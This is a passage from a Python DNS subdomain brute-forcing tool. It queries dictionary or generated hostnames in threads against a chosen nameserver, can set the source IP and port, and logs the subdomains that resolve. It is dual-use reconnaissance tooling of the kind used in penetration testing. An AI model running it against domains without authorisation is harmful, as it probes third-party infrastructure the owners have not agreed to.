    hostnames = []
    if opts.wordlist:
        hostnames = list(open(opts.wordlist, 'r'))
        return hostnames
    else:
        return wordlist
 
 
def attack(opts, hostname, attack_pool):
    if opts.verbose:
        sys.stdout.write('  -> trying %s\n' % hostname)
        sys.stdout.flush()
    try:
        x = dns.message.make_query(hostname, 1)
        if opts.protocol == 'udp':
            a = dns.query.udp(x, opts.dnshost, float(opts.timeout), 53, None,
                    opts.ipaddr, int(opts.port), True, False)
        else:
            a = dns.query.tcp(x, opts.dnshost, float(opts.timeout), 53, None,
                    opts.ipaddr, int(opts.port), False)
        attack_pool.release()
    except dns.exception.Timeout:
        print('[-] ERROR: time out!')
        sys.exit()
    except socket.error:
        print('''[-] ERROR: no connection? ip|srcport incorrectly defined? you
        can run only one thread if fixed source port specified!''')
        sys.exit()
    if a.answer:
        answ = ''
        # iterate dns rrset answer (can be multiple sets) field to extract
        # detailed info (dns and ip)
        for i in a.answer:
            answ += str(i[0])
            answ += ' '
        answer = (hostname, answ)
        found.append(answer)
    else:
        pass
    return
 
 
def str_gen(opts, hostnames):
    print('[+] generating list of strings')
    tmp_hostnames = itertools.product(opts.charset, repeat=int(opts.max))
    hostnames = list(tmp_hostnames)
    hostnames = map(''.join, hostnames)
    return hostnames
 
 
def run_threads(opts, hostname, attack_pool, threads):
    t = threading.Thread(target=attack, args=(opts, hostname, attack_pool))
    attack_pool.acquire()
    t.start()
    threads.append(t)
    return threads
 
 
def prepare_attack(opts, hostnames):
    sys.stdout.write('[+] attacking \'%s\' via ' % opts.domain)
    threads = list()
    attack_pool = threading.BoundedSemaphore(value=int(opts.threads))
    if opts.type == '0':
        sys.stdout.write('dictionary\n')
        for hostname in hostnames:
            hostname = hostname.rstrip() + '.' + opts.domain
            time.sleep(float(opts.wait))
            threads = run_threads(opts, hostname, attack_pool, threads)
        for t in threads:
            t.join()
    elif opts.type == '1':
        sys.stdout.write('bruteforce\n')
        hostnames = str_gen(opts, hostnames)
        for hostname in hostnames:
            hostname = opts.prefix + hostname + opts.postfix + '.' + opts.domain
            time.sleep(float(opts.wait))
            threads = run_threads(opts, hostname, attack_pool, threads)
        for t in threads:
            t.join()
    else:
        print('[-] ERROR: unknown attack type')
        sys.exit()
    return
 
 
def ip_extractor(ip):
    #extract ip from string of rrset answer object
    try:
        extracted = re.findall(r'[0-9]+(?:\.[0-9]+){3}', ip)
        return extracted[0]
    except:
        print('[-] ERROR: can\'t extract ip addresses')
        sys.exit()
 
 
def analyze_results(opts, found):
    #get maindomain ip
    try:
        mainhostip = socket.gethostbyname(opts.domain)
        #append domain|ip to diffound if subdomain ip different than starting
        # domain ip
        ([diffound.append(domain + ' | ' + ip)
        for domain, ip in found if ip_extractor(ip) != mainhostip])
    except dns.exception.Timeout:
        sys.exit()
    except socket.error:
        print('[-] ERROR: wrong domain or no connection?')
        sys.exit()
    return
 
 
def log_results(opts, found, diffound):
    if opts.logfile == 'stdout':
        print('---')
        if not found:
            print('no hosts found :(')
        else:
            print('ANSWERED DNS REQUESTS')
            print('---')
            for f in found:
                print(f[0]+' | '+f[1])
        if not diffound:
            print('---')
            print('NO HOSTS WITH DIFFERENT IP FOUND :(')
        else:
            print('---')
            print('ANSWERED DNS REQUEST WITH DIFFERENT IP')
            print('---')
            for domain in diffound:
                print(domain)
    else:
        print('[+] \033[0;94mlogging results to %s\033[0;m' % opts.logfile)
        with open(opts.logfile, 'w') as f:
            if found:
                f.write('---\n')
                f.write('ANSWERED DNS REQUESTS\n')
                f.write('---\n')
                for x in found:
                    f.write('domain: '+x[0]+' | '+x[1]+ '\n')
            if not diffound:
                f.write('---\nNO HOSTS WITH DIFFERENT IP FOUND :(\n')
            else:
                f.write('---\nANSWERED DNS REQUEST WITH DIFFERENT IP\n---\n')
                for domain in diffound:
                    f.write(domain + '\n')
        f.close()
    print('[+] game over')
    return
 
 
def main():
    check_usage()
    opts = parse_cmdline()
    check_cmdline(opts)
    if not opts.dnshost:
        defaults = get_default_nameserver()
    if not opts.ipaddr:
        defaults = get_default_source_ip()
    if opts.protocol != 'udp' and opts.protocol != 'tcp':
        print('[-] ERROR: unknown protocol')
        sys.exit(1337)
    opts = set_opts(defaults, opts)
    hostnames = read_hostnames(opts)
    prepare_attack(opts, hostnames)
    analyze_results(opts, found)
    log_results(opts, found, diffound)
    return
 
 
if __name__ == '__main__':
    try:
        print(BANNER + '\n')
        main()
    except KeyboardInterrupt:
        print('\n[!] WARNING: aborted by user')
        raise SystemExit
 
# EOF

(174)